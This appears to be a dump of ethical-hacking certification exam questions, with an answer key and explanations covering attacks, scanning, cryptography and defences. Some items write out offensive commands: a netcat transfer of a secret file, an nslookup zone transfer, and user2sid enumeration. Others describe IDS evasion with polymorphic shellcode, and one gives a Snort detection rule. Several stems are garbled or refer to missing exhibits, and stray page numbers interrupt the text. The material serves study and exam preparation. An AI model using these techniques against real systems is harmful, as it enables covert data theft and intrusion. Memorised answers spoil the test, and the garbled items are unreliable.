D (Explanation: Port Description: SOCKS. SOCKS port, used to support outbound tcp services (FTP, HTTP, etc). Vulnerable similar to FTP Bounce, in that attacker can connect to this port and \bounce\ out to another internal host. Done to either reach a protected internal host or mask true source of attack. Listen for connection attempts to this port -- good sign of port scans, SOCKS-probes, or bounce attacks. Also a means to access restricted resources. Example: Bouncing off a MILNET gateway SOCKS port allows attacker to access web sites, etc. that were restricted only to.mil domain hosts.)

594 Leonard is a systems administrator who has been tasked by his supervisor to slow down or lessen the amount of SPAM their company receives on a regular basis. SPAM being sent to company email addresses has become a large problem within the last year for them. Leonard starts by adding SPAM prevention software at the perimeter of the network. He then builds a black list, white list, turns on MX callbacks, and uses heuristics to stop the incoming SPAM. While these techniques help some, they do not prevent much of the SPAM from coming in. Leonard decides to use a technique where his mail server responds very slowly to outside connected mail servers by using multi-line SMTP responses. By responding slowly to SMTP connections, he hopes that SPAMMERS will see this and move on to easier and faster targets. What technique is Leonard trying to employ here to stop SPAM? 359 A. To stop SPAM, Leonard is using the technique called Bayesian Content Filtering B. Leonard is trying to use the Transparent SMTP Proxy technique to stop incoming SPAM C. This technique that Leonard is trying is referred to as using a Sender Policy Framework to aid in SPAM prevention D. He is using the technique called teergrubing to delay SMTP responses and hopefully stop SPAM

D (Explanation: Teergrubing FAQ What does a UBE sender really need? What does he sell? A certain amount of sent E-Mails per minute. This product is called Unsolicited Bulk E-Mail. How can anyone hit an UBE sender? By destroying his working tools. What? E-Mail is sent using SMTP. For this purpose a TCP/IP connection to the MX host of the recipient is established. Usually a computer is able to hold about 65500 TCP/IP connections from/to a certain port. But in most cases it's a lot less due to limited resources. If it is possible to hold a mail connection open (i.e. several hours), the productivity of the UBE sending equipment is dramatically reduced. SMTP offers continuation lines to hold a connection open without running into timeouts. A teergrube is a modified MTA (mail transport agent) able to do this to specified senders. Incorrect answer: Sender Policy Framework (SPF) deals with allowing an organization to publish "Authorized" SMTP servers for their organization through DNS records.)

575 You have installed antivirus software and you want to be sure that your AV signatures are working correctly. You don't want to risk the deliberate introduction of a live virus to test the AV software. You would like to write a harmless test virus, which is based on the European Institute for Computer Antivirus Research format that can be detected by the AV software. How should you proceed? A. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* B. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program 347 springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* C. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* D. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

D (Explanation: The EICAR test file (official name: EICAR Standard Anti-Virus Test File) is a file, developed by the European Institute for Computer Antivirus Research, to test the response of computer antivirus (AV) programs. The rationale behind it is to allow people, companies, and AV programmers to test their software without having to use a real computer virus that could cause actual damage should the AV not respond correctly. EICAR likens the use of a live virus to test AV software to setting a fire in a trashcan to test a fire alarm, and promotes the EICAR test file as a safe alternative.)

282 What is the term 8 to describe an attack that falsifies a broadcast ICMP echo request and includes a primary and secondary victim? A. Fraggle Attack B. Man in the Middle Attack C. Trojan Horse Attack D. Smurf Attack E. Back Orifice Attack

D (Explanation: Trojan and Back orifice are Trojan horse attacks. Man in the middle spoofs the Ip and redirects the victems packets to the cracker The infamous Smurf attack. preys on ICMP's capability to send 170 traffic to the broadcast address. Many hosts can listen and respond to a single ICMP echo request sent to a broadcast address. Network Intrusion Detection third Edition by Stephen Northcutt and Judy Novak pg 70 The "smurf" attack's cousin is called "fraggle", which uses UDP echo packets in the same fashion as the ICMP echo packets; it was a simple re-write of "smurf".)

581 Stephanie, a security analyst, has just returned from a Black Hat conference in Las Vegas where she learned of many powerful tools used by hackers and security professionals alike. Stephanie is primarily worried about her Windows network because of all the legacy computers and servers that she must use, due to lack of funding. Stephanie wrote down many of the tools she learned of in her notes and was particularly interested in one tool that could scan her network for vulnerabilities and return reports on her network's weak spots called SAINT. She remembered from her notes that SAINT is very flexible and can accomplish a number of tasks. Stephanie asks her supervisor, the CIO, if she can download and run SAINT on the network. Her boss said to not bother with it since it will not work for her at all. 351 Why did Stephanie's boss say that SAINT would not work? A. SAINT only works on Macintosh-based machines B. SAINT is too expensive and is not cost effective C. SAINT is too network bandwidth intensive D. SAINT only works on LINUX and UNIX machines

D (Explanation: Works with Unix/Linux/BSD and MacOS X http://www.saintcorporation.com/)

123 Study the log below and identify the scan type. tcpdump -w host 192.168.1.10 72 A. nmap R 192.168.1.10 B. nmap S 192.168.1.10 C. nmap V 192.168.1.10 D. nmap -sO -T 192.168.1.10

D (Explanation: -sO: IP protocol scans: This method is used to determine which IP protocols are supported on a host. The technique is to send raw IP packets without any further protocol header to each specified protocol on the target machine.)

326 Which is the right sequence of packets sent during the initial TCP three way handshake? A. FIN, FIN-ACK, ACK B. SYN, URG, ACK C. SYN, ACK, SYN-ACK D. SYN, SYN-ACK, ACK

D (Explanation: A TCP connection always starts with a request for synchronization, a SYN, the reply to that would be another SYN together with a ACK to acknowledge that the last package was delivered successfully and the last part of the three way handshake should be only an ACK to acknowledge that the SYN reply was recived. 195)

451 Ron has configured his network to provide strong perimeter security. As part of his network architecture, he has included a host that is fully exposed to attack. The system is on the public side of the demilitarized zone, unprotected by a firewall or filtering router. What would you call such a host? A. Honeypot B. DMZ host C. DWZ host D. Bastion Host

D (Explanation: A bastion host is a gateway between an inside network and an outside network. Used as a security measure, the bastion host is designed to defend against attacks aimed at the inside network. Depending on a network's complexity and configuration, a single bastion host may stand guard by itself, or be part of a larger security system with different layers of protection.)

199 You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters, numbers and special characters. With your existing knowledge of users, likely user account names and the possibility that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still get results? A. Online Attack B. Dictionary Attack C. Brute Force Attack D. Hybrid Attack

D (Explanation: A dictionary attack will not work as strong passwords are enforced, also the minimum length of 8 characters in the password makes a brute force attack time consuming. A hybrid attack where you take a word from a dictionary and exchange a number of letters with numbers and special characters will probably be the fastest way to crack the passwords.)

164 Exhibit: 96 What type of attack is shown in the above diagram? A. SSL Spoofing Attack B. Identity Stealing Attack C. Session Hijacking Attack D. Man-in-the-Middle (MiTM) Attack

D (Explanation: A man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised.)

300 Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The tool size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Bryce attempting to perform? A. Smurf B. Fraggle C. SYN Flood D. Ping of Death

D (Explanation: A ping of death (abbreviated "POD") is a type of attack on a computer that involves sending a malformed or otherwise malicious ping to a computer. A ping is normally 64 bytes in size (or 84 bytes when IP header is considered); many computer systems cannot handle a ping larger than the maximum IP packet size, which is 65,535 bytes. Sending a ping of this size can crash the target computer. Traditionally, this bug has been relatively easy to exploit. Generally, sending a 65,536 byte ping packet is illegal according to networking protocol, but a packet of such a size can be sent if it is fragmented; when the target computer reassembles the packet, a buffer overflow can occur, which often causes a system crash.)

8 Which of the following best describes Vulnerability? A. The loss potential of a threat B. An action or event that might prejudice security C. An agent that could take advantage of a weakness D. A weakness or error that can lead to compromise

D (Explanation: A vulnerability is a flaw or weakness in system security procedures, design or implementation that could be exercised (accidentally triggered or intentionally exploited) and result in a harm to an IT system or activity. 5)

501 Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS? A. He can use a shellcode that will perform a reverse telnet back to his machine B. He can use a dynamic return address to overwrite the correct value in the target machine computer memory C. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice D. He can use polymorphic shell code-with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS

D (Explanation: ADMmutate is using a polymorphic technique designed to circumvent certain forms of signature based intrusion detection. All network based remote buffer overflow exploits have similarities in how they function. ADMmutate has the ability to emulate the protocol of the service the attacker is attempting to exploit. The data payload (sometimes referred to as an egg) contains the instructions the attacker wants to execute on the target machine. These eggs are generally 304 interchangeable and can be utilized in many different buffer overflow exploits. ADMmutate uses several techniques to randomize the contents of the egg in any given buffer overflow exploit. This randomization effectively changes the content or 'signature' of the exploit without changing the functionality of the exploit.)

572 Which of the following is NOT a valid NetWare access level? A. Not Logged in B. Logged in C. Console Access D. Administrator

D (Explanation: Administrator is an account not a access level.)

430 June, a security analyst, understands that a polymorphic virus has the ability to mutate and can change its known viral signature and hide from signature-based antivirus programs. Can June use an antivirus program in this case and would it be effective against a polymorphic virus? A. No. June can't use an antivirus program since it compares the size of executable files to the database of known viral signatures and it is effective on a polymorphic virus B. Yes. June can use an antivirus program since it compares the parity bit of executable files to the database of known check sum counts and it is effective on a polymorphic virus C. Yes. June can use an antivirus program since it compares the signatures of executable files to the database of known viral signatures and it is very effective against a polymorphic virus D. No. June can't use an antivirus program since it compares the signatures of executable files to the database of known viral signatures and in the case the polymorphic viruses cannot be detected by a signature-based anti-virus program

D (Explanation: Although there are functions like heuristic scanning and sandbox technology, the Antivirus program is still mainly depending of signature databases and can only find already known viruses. 257)

425 What is the best means of prevention against viruses? A. Assign read only permission to all files on your system. B. Remove any external devices such as floppy and USB connectors. C. Install a rootkit detection tool. D. Install and update anti-virus scanner.

D (Explanation: Although virus scanners only can find already known viruses this is still the best defense, together with users that are informed about risks with the internet.)

543 Which of the following best describes session key creation in SSL? A. It is created by the server after verifying theuser's identity B. It is created by the server upon connection by the client C. It is created by the client from the server's public key D. It is created by the client after verifying the server's identity

D (Explanation: An SSL session always begins with an exchange of messages called the SSL handshake. The handshake allows the server to authenticate itself to the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.)

503 John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine. Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose? A. Use ClosedVPN B. Use Monkey shell C. Use reverse shell using FTP protocol D. Use HTTPTunnel or Stunnel on port 80 and 443 305

D (Explanation: As long as you allow http or https traffic attacks can be tunneled over those protocols with Stunnel or HTTPTunnel.)

101 One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker source IP address. You send a ping request to the broadcast address 192.168.5.255. [root@ceh/root]# ping -b 192.168.5.255 WARNING: pinging broadcast address PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data. 64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms 64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms --- --- --- There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why? 60 A. You cannot ping a broadcast address. The above scenario is wrong. B. You should send a ping request with this command ping 192.168.5.0-255 C. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. D. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address.

D (Explanation: As stated in the correct option, Microsoft Windows does not handle pings to a broadcast address correctly and therefore ignores them.)

213 Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products? A. Covert keylogger B. Stealth keylogger C. Software keylogger D. Hardware keylogger

D (Explanation: As the hardware keylogger never interacts with the Operating System it is undetectable by anti-virus or anti-spyware products.)

397 RC4 is known to be a good stream generator. RC4 is used within the WEP standard on wireless LAN. WEP is known to be insecure even if we are using a stream cipher that is known to be secured. What is the most likely cause behind this? A. There are some flaws in the implementation. B. There is no key management. C. The IV range is too small. D. All of the above. E. None of the above.

D (Explanation: Because RC4 is a stream cipher, the same traffic key must never be used twice. The purpose of an IV, which is transmitted as plain text, is to prevent any repetition, but a 24-bit IV is not long enough to ensure this on a busy network. The way the IV was used also opened WEP to a related key attack. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5000 packets. Many WEP systems require a key in hexadecimal format. Some users choose keys that spell words in the limited 0-9, A-F hex character set, for example C0DE C0DE C0DE C0DE. Such keys 239 are often easily guessed.)

497 SSL has been seen as the solution to several common security problems. Administrators will often make use of SSL to encrypt communication from point A to point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between point A and B? A. SSL is redundant if you already have IDS in place. B. SSL will trigger rules at regular interval and force the administrator to turn them off. C. SSL will slow down the IDS while it is breaking the encryption to see the packet content. D. SSL will mask the content of the packet and Intrusion Detection System will be blinded.

D (Explanation: Because the traffic is encrypted, an IDS cannot understand it or evaluate the payload.)

414 Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generate traffic on the network so that he can capture enough packets to crack the WEP key? A. Use any ARP requests found in the capture B. Derek can use a session replay on the packets captured C. Derek can use KisMAC as it needs two USB devices to generate traffic D. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic

D (Explanation: By forcing the network to answer to a lot of ICMP messages you can gather enough packets to crack the WEP key. 248)

369 Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below. Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ; After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ; What attack is being depicted here? A. Cookie Stealing B. Session Hijacking C. Cross Site Scripting D. Parameter Manipulation

D (Explanation: Cookies are the preferred method to maintain state in the stateless HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any malicious user can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit. 220)

542 Which of the following is NOT true of cryptography? A. Science of protecting information by encoding it into an unreadable format B. Method of storing and transmitting data in a form that only those it is intended for can read and process C. Most (if not all) algorithms can be broken by both technical and non-technical means D. An effective way of protecting sensitive information in storage but not in transit

D (Explanation: Cryptography will protect data in both storage and in transit.)

280 A denial of Service (DoS) attack works on the following principle: A. MS-DOS and PC-DOS operating system utilize a weaknesses that can be compromised and permit them to launch an attack easily. B. All CLIENT systems have TCP/IP stack implementation weakness that can be compromised and permit them to lunch an attack easily. C. Overloaded buffer systems can easily address error conditions and respond appropriately. D. Host systems cannot respond to real traffic, if they have an overwhelming number of incomplete connections (SYN/RCVD State). E. A server stops accepting connections from certain networks one those network become flooded.

D (Explanation: Denial-of-service (often abbreviated as DoS) is a class of attacks in which an attacker attempts to prevent legitimate users from accessing an Internet service, such as a web site. This can be done by exercising a software bug that causes the software running the service to fail (such as the "Ping of Death" attack against Windows NT systems), sending enough data to consume all available network bandwidth (as in the May, 2001 attacks against Gibson Research), or sending data in such a way as to consume a particular resource needed by the service.)

76 Destination unreachable administratively prohibited messages can inform the hacker to what? 45 A. That a circuit level proxy has been installed and is filtering traffic B. That his/her scans are being blocked by a honeypot or jail C. That the packets are being malformed by the scanning software D. That a router or other packet-filtering device is blocking traffic E. That the network is functioning normally

D (Explanation: Destination unreachable administratively prohibited messages are a good way to discover that a router or other low-level packet device is filtering traffic. Analysis of the ICMP message will reveal the IP address of the blocking device and the filtered port. This further adds the to the network map and information being discovered about the network and hosts.)

170 What tool can crack Windows SMB passwords simply by listening to network traffic? Select the best answer. A. This is not possible 102 B. Netbus C. NTFSDOS D. L0phtcrack

D (Explanation: Explanations: This is possible with a SMB packet capture module for L0phtcrack and a known weaknesses in the LM hash algorithm.)

510 What is the purpose of firewalking? A. It's a technique used to discover Wireless network on foot B. It's a technique used to map routers on a network link C. It's a technique used to discover interface in promiscuous mode D. It's a technique used to discover what rules are configured on a gateway

D (Explanation: Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can determine whether packets with various control information can pass through a given gateway.)

235 You suspect that your Windows machine has been compromised with a Trojan virus. When you run anti-virus software it does not pick of the Trojan. Next you run netstat command to look for open ports and you notice a strange port 6666 open. What is the next step you would do? A. Re-install the operating system. B. Re-run anti-virus software. C. Install and run Trojan removal software. D. Run utility fport and look for the application executable that listens on port 6666.

D (Explanation: Fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications. 141)

238 Exhibit: * Missing* Jason's Web server was attacked by a trojan virus. He runs protocol analyzer and notices that the trojan communicates to a remote server on the Internet. Shown below is the standard "hexdump" representation of the network packet, before being decoded. Jason wants to identify the trojan by looking at the destination port number and mapping to a trojan-port number database on the Internet. Identify the remote server's port number by decoding the packet? A. Port 1890 (Net-Devil Trojan) B. Port 1786 (Net-Devil Trojan) C. Port 1909 (Net-Devil Trojan) D. Port 6667 (Net-Devil Trojan)

D (Explanation: From trace, 0x1A0B is 6667, IRC Relay Chat, which is one port used. Other ports are in the 900's.)

327 What is Hunt used for? A. Hunt is used to footprint networks B. Hunt is used to sniff traffic C. Hunt is used to hack web servers D. Hunt is used to intercept traffic i.e. man-in-the-middle traffic E. Hunt is used for password cracking

D (Explanation: Hunt can be used to intercept traffic. It is useful with telnet, ftp, and others to grab traffic between two computers or to hijack sessions.)

26 NSLookup is a good tool to use to gain additional information about a target network. What does the following command accomplish? nslookup > server <ipaddress> > set type =any > ls -d <target.com> 16 A. Enables DNS spoofing B. Loads bogus entries into the DNS table C. Verifies zone security D. Performs a zone transfer E. Resets the DNS cache

D (Explanation: If DNS has not been properly secured, the command sequence displayed above will perform a zone transfer.)

469 While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. What can you infer from this observation? 282 A. They are using Windows based web servers. B. They are using UNIX based web servers. C. They are not using an intrusion detection system. D. They are not using a stateful inspection firewall.

D (Explanation: If they used a stateful inspection firewall this firewall would know if there has been a SYN-ACK before the ACK.)

481 All the web servers in the DMZ respond to ACK scan on port 80. Why is this happening ? 290 A. They are all Windows based webserver B. They are all Unix based webserver C. The company is not using IDS D. The company is not using a stateful firewall

D (Explanation: If they used a stateful inspection firewall this firewall would know if there has been a SYN-ACK before the ACK.)

502 You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this? A. Block TCP at the firewall B. Block UDP at the firewall C. Block ICMP at the firewall D. There is no way to completely block tracerouting into this area

D (Explanation: If you create rules that prevents attackers to perform traceroutes to your DMZ then you'll also prevent anyone from accessing the DMZ from outside the company network and in that case it is not a DMZ you have.)

202 What is GINA? 120 A. Gateway Interface Network Application B. GUI Installed Network Application CLASS C. Global Internet National Authority (G-USA) D. Graphical Identification and Authentication DLL

D (Explanation: In computing, GINA refers to the graphical identification and authentication library, a component of some Microsoft Windows operating systems that provides secure authentication and interactive logon services.)

516 Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of this server because of the potential for financial loss. Bob has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network. 313 Why will this not be possible? A. Firewalls can't inspect traffic coming through port 443 B. Firewalls can only inspect outbound traffic C. Firewalls can't inspect traffic coming through port 80 D. Firewalls can't inspect traffic at all, they can only block or allow certain ports

D (Explanation: In order to really inspect traffic and traffic patterns you need an IDS.)

435 In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antenna positioning. He places the antenna for the access point near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the buildings center. There is a large parking lot and outlying filed surrounding the building that extends out half a mile around the building. Bob figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of he following statements is true? A. Bob's network will not be safe until he also enables WEP B. With the 300-foot limit of a wireless signal, Bob's network is safe C. Bob's network will be sage but only if he doesn't switch to 802.11a D. Wireless signals can be detected from miles away; Bob's network is not safe

D (Explanation: It's all depending on the capacity of the antenna that a potential hacker will use in 260 order to gain access to the wireless net.)

254 Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of the following lists the best options? A. RSA, LSA, POP B. SSID, WEP, Kerberos C. SMB, SMTP, Smart card D. Kerberos, Smart card, Stanford SRP

D (Explanation: Kerberos, Smart cards and Stanford SRP are techniques where the password never leaves the computer.)

445 John is discussing security with Jane. Jane had mentioned to John earlier that she suspects an LKM has been installed on her server. She believes this is the reason that the server has been acting erratically lately. LKM stands for Loadable Kernel Module. What does this mean in the context of Linux Security? A. Loadable Kernel Modules are a mechanism for adding functionality to a file system without requiring a kernel recompilation. B. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiled and the system rebooted. C. Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation. D. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation.

D (Explanation: Loadable Kernel Modules, or LKM, are object files that contain code to extend the running kernel, or so-called base kernel, without the need of a kernel recompilation. Operating systems other than Linux, such as BSD systems, also provide support for LKM's. However, the Linux kernel generally makes far greater and more versatile use of LKM's than other systems. LKM's are typically used to add support for new hardware, filesystems or for adding system calls. When the functionality provided by an LKM is no longer required, it can be unloaded, freeing memory. 267)

373 What attack is being depicted here? 222 A. Cookie Stealing B. Session Hijacking C. Cross Site scripting D. Parameter Manipulation

D (Explanation: Manipulating the data sent between the browser and the web application to an attacker's advantage has long been a simple but effective way to make applications do things in a way the user often shouldn't be able to. In a badly designed and developed web application, malicious users can modify things like prices in web carts, session tokens or values stored in cookies and even HTTP headers. In this case the user has elevated his rights.)

135 Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing "server publishing"? A. Overloading Port Address Translation B. Dynamic Port Address Translation C. Dynamic Network Address Translation D. Static Network Address Translation

D (Explanation: Mapping an unregistered IP address to a registered IP address on a one-to-one basis. Particularly useful when a device needs to be accessible from outside the network.)

99 Why would an attacker want to perform a scan on port 137? A. To discover proxy servers on a network B. To disrupt the NetBIOS SMB service on the target host C. To check for file and print sharing on Windows systems D. To discover information about a target host using NBTSTAT

D (Explanation: Microsoft encapsulates netbios information within TCP/Ip using ports 135-139. It is trivial for an attacker to issue the following command: nbtstat -A (your Ip address) from their windows machine and collect information about your windows machine (if you are not blocking traffic to port 137 at your borders). 59)

49 John has scanned the web server with NMAP. However, he could not gather enough information to help him identify the operating system running on the remote host accurately. What would you suggest to John to help identify the OS that is being used on the remote web server? A. Connect to the web server with a browser and look at the web page. B. Connect to the web server with an FTP client. C. Telnet to port 8080 on the web server and look at the default page code. D. Telnet to an open port and grab the banner.

D (Explanation: Most people don't care about changing the banners presented by applications listening to open ports and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.)

59 While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan: 36 Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ <http://www.insecure.org/nmap/> ) Interesting ports on 172.121.12.222: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds What should be your next step to identify the OS? A. Perform a firewalk with that system as the target IP B. Perform a tcp traceroute to the system using port 53 C. Run an nmap scan with the -v-v option to give a better output D. Connect to the active services and review the banner information

D (Explanation: Most people don't care about changing the banners presented by applications listening to open ports and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.)

162 Null sessions are un-authenticated connections (not using a username or password.) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network? A. 137 and 139 B. 137 and 443 C. 139 and 443 D. 139 and 445

D (Explanation: NULL sessions take advantage of "features" in the SMB (Server Message Block) 95 protocol that exist primarily for trust relationships. You can establish a NULL session with a Windows host by logging on with a NULL user name and password. Primarily the following ports are vulnerable if they are accessible: 139 TCP NETBIOS Session Service 139 UDP NETBIOS Session Service 445 TCP SMB/CIFS)

200 An attacker runs netcat tool to transfer a secret file between two hosts. Machine A: netcat -l -p 1234 < secretfile Machine B: netcat 192.168.3.4 > 1234 He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt the information before transmitting onto the wire? 119 A. Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat <machine A IP> 1234 B. Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat <machine A IP> 1234 C. Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat <machine A IP> 1234 - pw password D. Use cryptcat instead of netcat

D (Explanation: Netcat cannot encrypt the file transfer itself but would need to use a third party application to encrypt/decrypt like openssl. Cryptcat is the standard netcat enhanced with twofish encryption.)

334 You wish to determine the operating system and type of web server being used. At the 199 same time you wish to arouse no suspicion within the target organization. While some of the methods listed below work, which holds the least risk of detection? A. Make some phone calls and attempt to retrieve the information using social engineering. B. Use nmap in paranoid mode and scan the web server. C. Telnet to the web server and issue commands to illicit a response. D. Use the netcraft web site look for the target organization's web site.

D (Explanation: Netcraft is providing research data and analysis on many aspects of the Internet. Netcraft has explored the Internet since 1995 and is a respected authority on the market share of web servers, operating systems, hosting providers, ISPs, encrypted transactions, electronic commerce, scripting languages and content technologies on the internet.)

154 What did the following commands determine? C : user2sid \earth guest S-1-5-21-343818398-789336058-1343024091-501 C:sid2user 5 21 343818398 789336058 1343024091 500 Name is Joe Domain is EARTH 91 A. That the Joe account has a SID of 500 B. These commands demonstrate that the guest account has NOT been disabled C. These commands demonstrate that the guest account has been disabled D. That the true administrator is Joe E. Issued alone, these commands prove nothing

D (Explanation: One important goal of enumeration is to determine who the true administrator is. In the example above, the true administrator is Joe.)

540 In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory, uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening on can 329 decrypt the message. Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to? A. Irreversibility B. Non-repudiation C. Symmetry D. Asymmetry

D (Explanation: PKI uses asymmetric key pair encryption. One key of the pair is the only way to decrypt data encrypted with the other.)

88 Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. This scan is eating up most of the network bandwidth and Neil is concerned. As a security professional, what would you infer from this scan? A. It is a network fault and the originating machine is in a network loop B. It is a worm that is malfunctioning or hardcoded to scan on port 500 C. The attacker is trying to detect machines on the network which have SSL enabled D. The attacker is trying to determine the type of VPN implementation and checking for IPSec

D (Explanation: Port 500 is used by IKE (Internet Key Exchange). This is typically used for IPSECbased VPN software, such as Freeswan, PGPnet, and various vendors of in-a-box VPN solutions such as Cisco. IKE is used to set up the session keys. The actual session is usually sent with ESP 52 (Encapsulated Security Payload) packets, IP protocol 50 (but some in-a-box VPN's such as Cisco are capable of negotiating to send the encrypted tunnel over a UDP channel, which is useful for use across firewalls that block IP protocols other than TCP or UDP).)

329 How would you prevent session hijacking attacks? A. Using biometrics access tokens secures sessions against hijacking B. Using non-Internet protocols like http secures sessions against hijacking C. Using hardware-based authentication secures sessions against hijacking D. Using unpredictable sequence numbers secures sessions against hijacking

D (Explanation: Protection of a session needs to focus on the unique session identifier because it is the only thing that distinguishes users. If the session ID is compromised, attackers can impersonate other users on the system. The first thing is to ensure that the sequence of identification numbers issued by the session management system is unpredictable; otherwise, it's trivial to hijack another user's session. Having a large number of possible session IDs (meaning that they should be very long) means that there are a lot more permutations for an attacker to try.)

555 Which of the following encryption is not based on Block Cipher? A. DES B. Blowfish C. AES D. RC4

D (Explanation: RC4 (also known as ARC4 or ARCFOUR) is the most widely-used software stream cipher and is used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet 337 traffic) and WEP (to secure wireless networks). Topic 22, Penetration Testing Methodologies)

416 Study the snort rule given below and interpret the rule. alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";) A. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet C. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111 D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111

D (Explanation: Refer to the online documentation on creating Snort rules at http://snort.org/docs/snort_htmanuals/htmanual_261/node147.html 249)

